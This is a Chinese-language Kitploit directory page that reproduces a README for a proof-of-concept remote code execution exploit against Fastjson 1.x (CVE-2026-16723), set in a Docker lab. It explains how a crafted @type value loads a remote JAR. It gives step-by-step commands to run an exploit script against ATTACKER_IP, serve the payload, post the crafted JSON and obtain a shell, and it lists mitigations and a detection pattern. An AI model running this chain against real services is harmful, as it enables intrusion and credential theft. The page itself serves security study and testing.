Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-16723 — 针对 Fastjson RCE(CVE-2026-16723)的 PoC 漏洞利用,可通过构造的 JSON 自动生成并投递 JAR 载荷,绕过 AutoType 限制。 | Kitploit
工具/GitHubGitHub/eqstlab/cve-2026-16723
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育红队Payload 开发
GitHubeqstlab/cve-2026-16723

CVE-2026-16723

针对 Fastjson RCE(CVE-2026-16723)的 PoC 漏洞利用,可通过构造的 JSON 自动生成并投递 JAR 载荷,绕过 AutoType 限制。

查看仓库
122天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-16723 Fastjson RCE

★ CVE-2026-16723 Fastjson @JSONType RCE PoC ★


概述

CVE-2026-16723 是 Fastjson 1.x(1.2.68 – 1.2.83)中的一个 远程代码执行(RCE) 漏洞。 当 Fastjson 解析攻击者控制的 JSON 时,精心构造的 @type 值会在 checkAutoType 内部被转换为类资源查找。在 Spring Boot 可执行 fat-JAR 中,类加载器将该名称解析为 jar:http:// URL 并获取远程 JAR(SSRF),随后即使 AutoType 被禁用,也会加载带有 @JSONType 注解的类。 由于现代 JDK / Tomcat 会拒绝 jar:http:// 二进制名称,可靠的变体将 JAR 植入 JVM 缓存,并通过 jar:file:/proc/self/fd/N 重新读取,从而定义类并运行其静态初始化器,实现代码执行。 AutoType 保持禁用,且无需任何 classpath gadget。


受影响版本

分类版本
受影响Fastjson 1.2.68 ≤ 版本 ≤ 1.2.83
已修复迁移到 Fastjson 2.x(无 1.x 修复版本)

影响

  • 以服务账户身份远程执行代码
  • 从主机和环境泄露机密 / 凭据
  • 完全攻陷受影响的应用程序

环境

实验室目标是一个公开商店前端(Northwind Store),其搜索 API 使用 Fastjson 绑定 请求体。所有配置均为 Fastjson 的默认设置: SafeMode 关闭、AutoType 关闭,并以 Spring Boot fat-JAR 形式打包。

root@kitploit:~
docker build -t cve-2026-16723 .
docker run -d --name cve-2026-16723 -p 8080:8080 cve-2026-16723
前置条件本实验室状态
Fastjson 1.2.68 – 1.2.831.2.83
Spring Boot 可执行 fat-JAR是
未认证的 JSON 解析路径POST /api/products/search
SafeMode / AutoType默认(均关闭)

PoC

攻击者和目标运行在同一 Docker 桥接网络上,因此目标以出站连接方式访问攻击者(无需发布额外端口)。

第 1 步:确认目标已启动

root@kitploit:~
curl http://TARGET_IP:8080/api/health
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' -d '{"keyword":"keyboard"}'

第 2 步:在攻击者机器上运行漏洞利用

exploit.py 构建有效载荷 JAR、托管该 JAR、启动监听器,并打印请求体。仅需要回调地址。

root@kitploit:~
python3 attacker/exploit.py --lhost ATTACKER_IP --lport 4444

第 3 步:投递有效载荷

将打印出的请求体粘贴到搜索端点(Burp Repeater 或 curl)并发送。该搜索请求是正常功能;仅其 JSON 请求体是精心构造的。

root@kitploit:~
curl -X POST http://TARGET_IP:8080/api/products/search \
  -H 'Content-Type: application/json' --data-binary @body.json

第 4 步:确认结果

代码以服务账户身份运行。通过获得的 shell 获取 flag:

root@kitploit:~
whoami

缓解措施

  • 迁移到 Fastjson 2.x
  • 或运行 com.alibaba:fastjson:1.2.83_noneautotype
  • 或使用 -Dfastjson.parser.safeMode=true 启动 JVM
  • 检测:JSON @type 值中包含 jar:http 或 jar:file / /proc/self/fd 模式

分析

  • KR:
  • EN:
下载工具